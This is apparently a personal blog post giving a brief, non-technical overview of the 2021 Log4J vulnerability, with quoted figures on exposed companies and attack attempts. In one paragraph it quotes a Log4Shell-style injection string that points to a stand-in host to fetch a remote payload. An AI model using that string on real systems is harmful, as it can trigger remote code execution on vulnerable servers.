18 December 2021

Log4J — A Brief Overview

I haven't said anything about Log4J, because I've been trying to cut back on the technology posts. But the internet is basically on fire.

Nightmare before Christmas: What to know about the Log4j vulnerability

There is some debate as to whether it is "log-4-jay" or "log-forge." I don't think it matters.

It is a big deal, perhaps the worst internet vulnerability ever, certainly the largest in the past decade.

The list of potential victims encompasses nearly a third of all web servers in the world, according to cybersecurity firm Cybereason. Twitter, Amazon, Microsoft, Apple, IBM, Oracle, Cisco, Google, and one of the world's most popular video games, Minecraft, count themselves among the slew of tech and industry giants running the popular software code that U.S. officials estimate has left hundreds of millions of devices exposed.

By Friday, more than 3,700,000 hacking attempts had been made to exploit the vulnerability, according to leading cybersecurity firm Checkpoint, with more than 46% conducted by known malicious groups.

Cryptominers jumped on the hack to start, but some of the ransomware gangs are already trying to leverage Log4J as a way into vulnerable organizations. I'm sure they will be in the news shortly, if they aren't already.

If you have any interest in the technology of Log4J, you probably are already familiar with what it is exactly. If you aren't familiar, the link above does a fair job of explaining it. Most of the stuff I've turned up in searches jumps right into the deep end with a discussion of things like ${jndi:ldap://EEEvil.com:1389/EEEEvilPayload}, which you don't need to understand. Unless, of course, you do need to understand it.

Anyway, if you have friends in technology, they may be hard to get in touch with this week. You might consider that they are not snubbing you, they are just drowning in despair. Some moral support might not be a bad idea.
